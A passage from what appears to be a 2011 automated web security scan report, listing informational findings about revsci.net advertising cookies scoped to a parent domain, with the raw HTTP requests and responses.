1PmESYSukjOCdF1PF/KASQsp3y+4OuRfvCpIzUyUgS7Sbx9HYOlumbNVf+qX5rSKUNgiUJaD7nw0NvHJyBAnJJe+9a3RoGA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:37:53 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:37:52 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.161. http://pix04.revsci.net/I10985/b3/0/3/1008211/48193081.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/48193081.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKrDXFyf2BIJjwRtF66AS5NH6WeHi66QiBAbzuCfcTOvbS7pGUjONH+30I2ZuPpFFcJfLwMGBPKQaQeWilp3IbaUy4YHwwCQ54z6HyEJjii4lNh+z72sqS8+sc4nxiV6/ef0ICmGx5g7xCy4pMdlCvlXW9zmpmAaRe4AnwFVp3janDXi1hx/1AwyItq6cJ/DahrGn/8I2DqZtPPL4L8ZvJCkkBlSEPLmp8X89FhkTc3FX0EkoMV5wb2GKZrUAz9ZSnPla73H20hG6GDVAIlzGqD+HVKrdZtLEidm93t8ba3/QYEvZjybQVdzPgDlAfmqRuz5eOiQHgdKtZ6+0GVBaWGSGXv2awNuIYpbEfWDSeC95RH9v496KovSxzmy0QeQtRVtIHaEMUwGA7gJSahwg8lJOmUN8MQxN/P/0y; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:21:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/48193081.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_34v8="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpihGJj4llhxrIpKhnxvCqNJV+6n10UiflLT2U8DOlwGEjR0TVcemT1DUjfH8oh8yRi/RAd80bpK/lFDTj9A5kkDRuEN30YAuOhJs2CmOnGedOFSdCL18w5Nwznr97xDJiX+seD/hjd5tu+y4pkJrTtyha4iz+wVZ+0rKQ1vrfuatTG+1XIintKVIShKSa5GjJ0+NySRkiA4gTw0h9Wo49VbeYeG33svkQyKx2nBHu1V9HvM1NOMRCcloB5LPMEfUKHEA7zYQuiJVSHgpUraI4MdCYd0j7nw/7TF6Prd7NW5t28CSbc9CyowVuXenTQTxKo2RP/e2fxUsG8J16em0KjtjmmwTCES2saXS5GMcsW/DXLWTISDt0uEbVNX3N1fZYBd6Ndq9BkStWLbrNYHLrFZ3i5zp3BI3NpTyty5GJjEokGuhKYLbFUB62dQe0tsPZUiQjV6sni6UujDfw6Yn0M1u8v1Fsmap3dNhbvfJ2B08tqGXEVxvpJiDAtOJ0XCoKAvSE4e1qLnZfsLuvzSsguE9hpOs9HVIZFS5jGLvOR0nYtjTOia4DV1Y1hjjIQ4/pxAZ65mS4Evb3s+0SMaPowEXYVxgBTjS7SpK3IFaknqXJ61Nm2O8IqIVX+J0mGQWzRVBm1Zu3rPZMoVtl4L9W/OpjBs3qexeOminO9R98+GI6WcXz6v911kVQB9WjuW8Fmubsm0ICWm/Ynub0uZ9OCpEp8z4vQqPA7KI+Cz3PXoaP126GjoVJaSICR4Y2RmXoCFJhHKU2JDa6kzvp8QY4i/gH5yR2KvPtj9dghTXDajDg+7MnBW3RWS/IHmZqhyEEe0DuaFY7W/T5FHjWKal4wyQKB6xwBwWbA1+jW9PpYwHsmtJ3JnoK3XCydroW28tWesMZS4JFy3uVgCRzC+akPxyOBjvxgMs3ifZx67RJPRUHCPQXH6MTJazoh+D39NXc14zW0+8+JURG7MgkS3wJS38HoJbRca8dgMt49KTI028/pUCNKuTkoK8CbWI/o9jkK12xn4aZDqwtOO1O44zuwvNNSix6QpIPH1JQswxoRUMjM1/KbLmDV0EOlttp9NwrxWHDu+eWtTdSt9ETRcnCzXb35dMFxqM8+PEhC8WARLiFlca7Pzc6DkQ2NnP+SJaW+bysvdcTCeSWvs3H2xf7hCvnVwXXev9dJTApCpXjHyqjRXqffTuQgkWAa7IfaE4+H6t0S1vCR4JaM/atnMSOu5709LXeI/l7kLTEDO4kRaDQ+bD93P+UxIuFerYQ6QQ7QGa+KSvFFqt8uAPd6wERHGzS49adQEIffGA=="; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+agzaymK59vZiJkFr2VpXgkC+Jr7XRUnyJCk8YM/Hg5qLS9hklPbsk1DrJekn2UyPIkRgzgJv6bVhx869U8+lVAcotGV6+xKWd5Q2/WKU7YoaQv2VLQmhi1LpKoztjEPxmiO17TU7z79ngiQ4o3n/nFK99X/VmdV4IWRdXxOcCuxjIQdkLEZ033N7GzxdQPxF5PBmhOxOlQ150eYxApLzSBYpqFEqmeFdWn6+pl8c3vMQO3RauywuPKn6SnLG792z+rV5MZBV/csFD/0PfKSQpGdSCfF1b4bHbOktjD4I6wy6EUpSwB3Sv4dqnkXuCiPQ4Lkygy4tmNkZO25SZLZWaMRkEyJ/9luf2te0/du4eEWtieXpjJNURgFdfGFIZdTCD9s9skCJJZSymfNFpnBB4XQPVwE2ZleD3BWPXRgOqqH9Au7RqNx4Kv1q0Q3QJcR0YA1m4lUcWR/syI70dNh2c9k6ZT+u2zCSSNMpFjo93jcW9t2niBHnY0ZarNyHYB+R5IAw8ItvdgfR6vY/IobO3Y1LM1cHqtLyn5CDwgkxxRWakznUHGCdW5gu8xl+S5lSVSzC68EQLryJ2kL/M+9wzdzfYJRZ4rV3n+z1mPC4RG2sCPSKnvojwQRRuIoOD+hkx8w8Jf3aJfruhhUyMJBCWe/7U4VkSvjxUDPql593RxJyB0bOZOuWgOBmK4L81yHNk+LHEzhSglvAMIsOLsiKjp2EYLEwxgd4QYZ0SreTQ9H99Cg+YXA4UVaTVFky+rbh3ZsF6cesfvVvVOrtlKoAnGc9+aQNP4+fViDg1D8KGg6TLSutVdjc2BNQeGlnIAESwwvyuvFaAN5s/Edg7OUBg2n8/mbc6kdDdOZ+6903QZtAZrdekSTVml0tPpIT+DjDAQNHDnDaSDkLldAdCeyr2qfhEUTix6VMmh4u/5a81kgGX9QreEKfdBIpIp+DkBVtq/AFYrt1rtaRtT45/gkc+iLrX2A/cjC53QYgqh+FxDvAq02cBacG+1Xg5KhbbF+P6m8TZNnW2WKnKFugeqQDLabw2+SfYovFkpitNY9HN9lqAJA35F2ghbHGw/iIi/X08g4UgeCA0qttICpzyx52M9DCPMtmw3pGF3cEOAHlgOXYvhaXpUT/wAXabnHqAjXeMAk3cSw3Ge1g31B95wNyNNGOYM8N7+cB8Zs+I+C5N3uH/sqcQt/4NlOXumxdFZIyAedFXcbKMf5AkAtxyGvgZB6sagfsFzCOAu1YmIT6Z9RHefSw7MCCRWeylgL0HKxVt5Vkwm+cFOoyEmqDW++nvdgx5ER8br6F2Yrs6SYtpXLaLXRbBjVo3oKj9pmdtZ6ll98hp9zDxSV0u5LXS6XymXY/Rq9+g5CWFYEKJfrSfc0kisnr/U/PH4vMCoNw4nXCIvCHQNn3bpDU/NRP1Ijjn/63xGBcgazZHHZsrWMcQvum6MbypzvmQWXXsMgCXcM9qdcWCmCMThAMk2HDH70dhHLh5M+MR/VcxVNsmUppApCvr5VHfOQKovoVZagXyk9kuWNCVDBnkwydIO+M1d9l6EtvZrjy/O21gynVl/WjVsT4K/wOj3On8y2eMRI91ks5rMdmiMVUPllKwNec4Jq+e3MYheMD/LgjengHFfZGEsdcxhIDkDjNbfFqxDzOJ6wmi1S5aKiOhdlMjLsD0p+GDqJqx3gXLGaY3xufmqmQ1ybrv3IvWDkF3j1KJdfzaFE6uvuBcHWDs5s7knN7EPH2jD5c+QyhaO6yZhNDQDS7HmjgodXC"; rsi_segs_1000000=pUPF5EOhOHMQpzax0RBh/hoCyNk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhnALDb2WLZYBIlHHq5L+Vu6oYeS0lSb84FoFlDVAUEgoeqnG3CWwQTGxfWB8xHls9O7wrmK7H9XO38QK/GK4m862ulXtBHxCFUVWq3L7O2akFAHGDjHWNgyYfzAVKcGUKvjUjNcJyGQJjZJ5/SdX8FYao+hd3VVlz+4nsCWlDJBaHPjrmWcFmQ1GekdD06w1Fa/StT4hGfRIltoEgDAAEilvBfLBgEbRBxTXu0uQpY2Nw5Z6/D4xtp1uh7al0twU2fKW74+/MPBb/gZ/oX+vOdsW6pJIh5qsEdbi1QornVEiz/mSs4Rr4srvtD5JVq6cjl96OahfYK1iv8mSPlKfKoVF7DoYGxGbX/i5iSbtsFIEyW2jm9Ig+OydZDLH2HoeOShYLCYcDvLnJZcnpEusQAmGaKQm2k07Pni/xL20dzRt96dG30W1Ky9zSsWL+V4kxdvsyI4bYE77uo8zIDPzYhxyqDe2Tzf2i8M4DYGvTsTRKCtIWprv0iRcq+mthAneECHTSt2H/2KNnz1HocLzMNeArgnc+ZUQDFpviVlwyEa9117eKQuW7mrfPfBVeFmj93GSQEJJe+9h/ln4g==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKrDXFyf2BIJjwRtF66AS5NH6WeHi66QiBAbzuCfcTOvbS7pGUjONH+30I2ZuPpFFcJfLwMGBPKQaQeWilp3IbaUy4YHwwCQ54z6HyEJjii4lNh+z72sqS8+sc4nxiV6/ef0ICmGx5g7xCy4pMdlCvlXW9zmpmAaRe4AnwFVp3janDXi1hx/1AwyItq6cJ/DahrGn/8I2DqZtPPL4L8ZvJCkkBlSEPLmp8X89FhkTc3FX0EkoMV5wb2GKZrUAz9ZSnPla73H20hG6GDVAIlzGqD+HVKrdZtLEidm93t8ba3/QYEvZjybQVdzPgDlAfmqRuz5eOiQHgdKtZ6+0GVBaWGSGXv2awNuIYpbEfWDSeC95RH9v496KovSxzmy0QeQtRVtIHaEMUwGA7gJSahwg8lJOmUN8MQxN/P/0y; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:21:12 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:21:12 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.162. http://pix04.revsci.net/I10985/b3/0/3/1008211/482745036.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/482745036.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOeqAX2dHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0R58oFoFlDVAZ0Q4WilEZa1mbBjW7OLLoFHNs08LFTYGZVXlxUvEZzx6zjOYyj3SuXnsHKw1Hvruz3Uf+BvgDGGbJFLjv17ScTkhkvU4QksCyof4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05S6hScUZY7jk9D/Y8sdnlHP/5/KhztJWUGMe/sHwrlis9rTQ4OBxCCmn++3BZxuPdVxi72aac440Q/3qnyjjl2l8QCPhNcivyQRKN1wF41CvAMSuXqscYt7nj+CdF1MH095+w6kmZgwek1xMzZ4zky0gS2QxO463ZSF9wyEYAPJHWdj2jbkj/QfHReEGjT1LQCFxv+id019oHQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:48:06 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/482745036.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suh